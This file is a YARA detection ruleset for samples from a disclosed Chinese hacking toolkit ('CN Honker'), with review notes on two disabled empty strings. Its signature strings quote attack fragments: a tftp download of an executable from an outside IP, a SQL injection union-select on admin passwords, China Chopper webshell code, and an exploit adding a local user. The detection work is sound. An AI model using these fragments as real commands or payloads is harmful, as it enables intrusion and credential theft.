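/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2015-06-23
   Identifier: CN-PentestSet
*/

/* Rule Set ----------------------------------------------------------------- */

/*
   Review notes:
   - Every rule matches a small set of embedded strings under a filesize bound. PE samples
     additionally require the MZ magic (uint16(0) == 0x5a4d), the ASP sample the "<%" magic
     (uint16(0) == 0x253c); the VBS and TXT samples have no magic check at all.
   - Two string literals are empty in this copy of the file (CN_Honker_net_priv_esc2 $s2 and
     CN_Honker_Happy_Happy $s1). YARA rejects empty string literals at compile time, so the
     ruleset would not load as written. Both are disabled below with a FIXME; the lost content
     (presumably non-ASCII text dropped during extraction) must be restored from the upstream
     signature-base file rather than guessed at.
*/

rule CN_Honker_MAC_IPMAC {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
      id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
   strings:
      $s1 = "Http://Www.YrYz.Net" fullword wide
      $s2 = "IpMac.txt" fullword ascii
      $s3 = "192.168.0.1" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 267KB and all of them
}

rule CN_Honker_GetSyskey {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
      id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
   strings:
      $s2 = "GetSyskey [Output system key file]" fullword ascii /* PEStudio Blacklist: strings */
      $s4 = "The system key file \"%s\" is created." fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 40KB and all of them
}

rule CN_Honker_Churrasco {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
      id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
   strings:
      $s0 = "HEAD9 /" ascii
      $s1 = "logic_er" fullword ascii
      $s6 = "proggam" fullword ascii
      $s16 = "DtcGetTransactionManagerExA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 12 times */
      $s17 = "GetUserNameA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 305 times */
      $s18 = "OLEAUT" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 1276KB and all of them
}

rule CN_Honker_mysql_injectV1_1_Creak {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "a1f066789f48a76023598c5777752c15f91b76b0"
      id = "39025a57-557a-53c0-bfdb-81fe83f824af"
   strings:
      $s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii /* PEStudio Blacklist: strings */
      $s12 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 5890KB and all of them
}

rule CN_Honker_ASP_wshell {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
      id = "028136cd-129b-5d58-a4c2-ba730a798c06"
   strings:
      $s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "UserPass="
      $s2 = "VerName="
      $s3 = "StateName="
   condition:
      /* 0x253c is the little-endian reading of the two bytes "<%" at offset 0 (ASP file start) */
      uint16(0) == 0x253c and filesize < 200KB and all of them
}

rule CN_Honker_exp_iis7 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file iis7.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
      id = "edfafc9a-032a-5ccb-9a1f-faeab0dfa31d"
   strings:
      $s0 = "\\\\localhost" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "iis.run" fullword ascii
      $s3 = ">Could not connecto %s" fullword ascii /* PEStudio Blacklist: strings */
      $s4 = "WinSta0\\Default" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 22 times */
   condition:
      uint16(0) == 0x5a4d and filesize < 60KB and all of them
}

rule CN_Honker_SegmentWeapon {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "494ef20067a7ce2cc95260e4abc16fcfa7177fdf"
      id = "e1b6f721-4c4d-50f2-9ed6-f38e8e7ea4ab"
   strings:
      $s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "http://www.nforange.com/inc/1.asp?" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 100KB and all of them
}

rule CN_Honker_Alien_iispwd {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
      id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
   strings:
      $s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      /* script sample: no file-magic check, filesize bound only */
      filesize < 3KB and all of them
}

rule CN_Honker_Md5CrackTools {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
      id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
   strings:
      $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
      $s2 = ",'|head -n 1|cut -d ' ' -f 1|sed" ascii /* PEStudio Blacklist: strings */
   condition:
      /* no file-magic check, filesize bound only */
      filesize < 30KB and all of them
}

rule CN_Honker_COOKIE_CooKie {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
      id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
   strings:
      $s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii /* PEStudio Blacklist: strings */
      $s5 = "CooKie.exe" fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 360KB and all of them
}

rule CN_Honker_wwwscan_1_wwwscan {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "6bed45629c5e54986f2d27cbfc53464108911026"
      id = "8b6a94a3-6f9c-59b2-931b-c06701b95d59"
   strings:
      $s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii /* PEStudio Blacklist: strings */
      $s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 180KB and all of them
}

rule CN_Honker_D_injection_V2_32 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
      id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
   strings:
      $s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide /* PEStudio Blacklist: strings */
      $s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 5000KB and all of them
}

rule CN_Honker_net_priv_esc2 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "4851e0088ad38ac5b3b1c75302a73698437f7f17"
      id = "b4fa3129-57a3-55ee-8ca6-ecbcc135184e"
   strings:
      $s1 = "Usage:%s username password" fullword ascii /* PEStudio Blacklist: strings */
      /* FIXME(review): this literal is empty in this copy of the file. YARA rejects empty
         string literals at compile time, so it is disabled here rather than guessed at.
         Restore the original content from the upstream signature-base file. Until then
         the condition effectively requires $s1 alone, i.e. the rule is slightly broader
         than the author intended. */
      // $s2 = "" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 17KB and all of them
}

rule CN_Honker_Oracle_v1_0_Oracle {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
      id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
   strings:
      $s1 = "!http://localhost/index.asp?id=zhr" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */
      $s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 3455KB and all of them
}

rule CN_Honker_Interception {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
      id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
   strings:
      $s2 = ".\\dat\\Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
      $s5 = "WinlogonHackEx " fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 160KB and all of them
}

rule CN_Honker_sig_3389_DUBrute_v3_0_RC3_3_0 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file 3.0.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "49b311add0940cf183e3c7f3a41ea6e516bf8992"
      id = "994ad7e9-2019-54b3-84e6-2762a700c939"
   strings:
      $s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */
      $s9 = "CryptGenRandom" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 581 times */
   condition:
      uint16(0) == 0x5a4d and filesize < 395KB and all of them
}

rule CN_Honker_windows_exp {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file exp.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "04334c396b165db6e18e9b76094991d681e6c993"
      id = "148900d0-cf62-5cb0-adbc-52fa8ce8832e"
   strings:
      $s0 = "c:\\windows\\system32\\command.com /c " fullword ascii /* PEStudio Blacklist: strings */
      $s8 = "OH,Sry.Too long command." fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 220KB and all of them
}

rule CN_Honker_safe3wvs_cgiscan {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f94bbf2034ad9afa43cca3e3a20f142e0bb54d75"
      id = "a9f7a195-deb8-5887-bc55-d1b0cac43182"
   strings:
      $s2 = "httpclient.exe" fullword wide
      $s3 = "www.safe3.com.cn" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 357KB and all of them
}

rule CN_Honker_pr_debug {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file debug.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
      id = "6d759818-b762-56f4-8475-82a7d18a659c"
   strings:
      $s1 = "-->Got WMI process Pid: %d " ascii /* PEStudio Blacklist: strings */
      $s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 820KB and all of them
}

rule CN_Honker_T00ls_Lpk_Sethc_v4_0 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "98f21f72c761e504814f0a7db835a24a2413a6c2"
      id = "d41cbed5-a6e3-5165-a8c3-e0375c1ed75d"
   strings:
      $s0 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */
      $s15 = "2011-2012 T00LS&RICES" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 2077KB and all of them
}

rule CN_Honker_MatriXay1073 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      modified = "2023-01-27"
      score = 70
      hash = "fef951e47524f827c7698f4508ba9551359578a5"
      id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
   strings:
      $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii /* PEStudio Blacklist: strings */
      $s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii /* PEStudio Blacklist: strings */
      $s3 = "getalluserpasswordhash" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 9100KB and all of them
}

rule CN_Honker_Sword1_5 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Sword1.5.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
      id = "832e4998-64fc-5f34-a46d-aeefde0ee763"
   strings:
      $s1 = "http://www.md5.com.cn" fullword wide
      $s2 = "ListBox_Command" fullword wide /* PEStudio Blacklist: strings */
      $s3 = "\\Set.ini" wide
      $s4 = "OpenFileDialog1" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 740KB and all of them
}

rule CN_Honker_Havij_Havij {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
      id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
   strings:
      $s1 = "User-Agent: %Inject_Here%" fullword wide /* PEStudio Blacklist: strings */
      $s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}

rule CN_Honker_exp_ms11011 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ms11011.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
      id = "fc092166-73cd-58f6-b034-a2fe2c5fb859"
   strings:
      $s0 = "\\i386\\Hello.pdb" ascii /* PEStudio Blacklist: strings */
      $s1 = "OS not supported." fullword ascii /* PEStudio Blacklist: strings */
      $s2 = ".Rich5" fullword ascii
      $s3 = "Not supported." fullword wide /* PEStudio Blacklist: strings */ /* Goodware String - occured 3 times */
      $s5 = "cmd.exe" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 120 times */
   condition:
      uint16(0) == 0x5a4d and filesize < 100KB and all of them
}

rule CN_Honker_DLL_passive_privilege_escalation_ws2help {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
      id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
   strings:
      $s0 = "PassMinDll.dll" fullword ascii
      $s1 = "\\ws2help.dll" ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 30KB and all of them
}

rule CN_Honker_Webshell {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Webshell.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "c85bd09d241c2a75b4e4301091aa11ddd5ad6d59"
      id = "12870766-2b85-522d-9ad8-abba2786caaf"
   strings:
      $s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "Do you want to cancel the file download?" fullword ascii /* PEStudio Blacklist: strings */
      $s3 = "Downloading: %s" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 381KB and all of them
}

rule CN_Honker_AspxClient {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      modified = "2022-12-21"
      score = 70
      hash = "67569a89128f503a459eab3daa2032261507f2d2"
      id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
   strings:
      $s1 = "\\tools\\hashq\\hashq.exe" wide
      $s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
      $s3 = "\\myshell.mdb" wide /* PEStudio Blacklist: strings */
      $s4 = "injectfile" fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them
}

rule CN_Honker_Fckeditor {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "4b16ae12c204f64265acef872526b27111b68820"
      id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
   strings:
      $s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide /* PEStudio Blacklist: strings */
      $s7 = "Fckeditor.exe" fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 1340KB and all of them
}

rule CN_Honker_Codeeer_Explorer {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
      id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
   strings:
      $s2 = "Codeeer Explorer.exe" fullword wide /* PEStudio Blacklist: strings */
      $s12 = "webBrowser1_ProgressChanged" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 470KB and all of them
}

rule CN_Honker_SwordHonkerEdition {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file SwordHonkerEdition.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "3f9479151c2cada04febea45c2edcf5cece1df6c"
      id = "5688fa03-bcb0-545d-9fdf-7ab48a389424"
   strings:
      $s0 = "\\bin\\systemini\\MyPort.ini" wide /* PEStudio Blacklist: strings */
      $s1 = "PortThread=200 //" fullword wide /* PEStudio Blacklist: strings */
      $s2 = " Port Open -> " fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 375KB and all of them
}

rule CN_Honker_HASH_PwDump7 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
      id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
   strings:
      $s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "No Users key!" fullword ascii /* PEStudio Blacklist: strings */
      $s3 = "NO PASSWORD*********************:" fullword ascii /* PEStudio Blacklist: strings */
      $s4 = "Unable to dump file %S" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 380KB and all of them
}

rule CN_Honker_ChinaChopper {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
      id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
   strings:
      $s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide /* PEStudio Blacklist: strings */
      $s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide /* PEStudio Blacklist: strings */
      $s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them
}

rule CN_Honker_dedecms5_7 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f9cbb25883828ca266e32ff4faf62f5a9f92c5fb"
      id = "b037862d-2821-5e96-996b-13ab241575ba"
   strings:
      $s1 = "/data/admin/ver.txt" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "SkinH_EL.dll" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 830KB and all of them
}

rule CN_Honker_Alien_ee {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ee.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
      id = "03540f82-6662-55e3-97f8-38776271f08b"
   strings:
      $s1 = "GetIIS UserName and PassWord." fullword wide /* PEStudio Blacklist: strings */
      $s2 = "Read IIS ID For FreeHost." fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 50KB and all of them
}

rule CN_Honker_smsniff_smsniff {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file smsniff.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "8667a785a8ced76d0284d225be230b5f1546f140"
      id = "fef242d5-b274-5217-a5d1-1a6ec38d0fdd"
   strings:
      $s1 = "smsniff.exe" fullword wide
      $s5 = "SmartSniff" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 267KB and all of them
}

rule CN_Honker_Happy_Happy {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      modified = "2023-01-27"
      score = 70
      hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
      id = "6e6c806d-e784-507f-b327-3b9f2510422b"
   strings:
      /* FIXME(review): this literal is empty in this copy of the file. YARA rejects empty
         string literals at compile time, so it is disabled here rather than guessed at.
         Restore the original content from the upstream signature-base file. With it
         disabled the "2 of them" condition is evaluated over $s2..$s4 only. */
      // $s1 = "" fullword wide /* PEStudio Blacklist: strings */
      $s2 = "domainscan.exe" fullword wide /* PEStudio Blacklist: strings */
      $s3 = "http://www.happysec.com/" wide
      $s4 = "cmdshell" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 655KB and 2 of them
}

rule CN_Honker_T00ls_Lpk_Sethc_v3_0 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "fa47c4affbac01ba5606c4862fdb77233c1ef656"
      id = "7513a513-e8a3-58a8-8dd5-512ba33ff013"
   strings:
      $s1 = "http://127.0.0.1/1.exe" fullword wide /* PEStudio Blacklist: strings */
      $s2 = ":Rices Forum:T00Ls.Net [4 Fucker Te@m]" fullword wide
      $s3 = "SkinH_EL.dll" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
}

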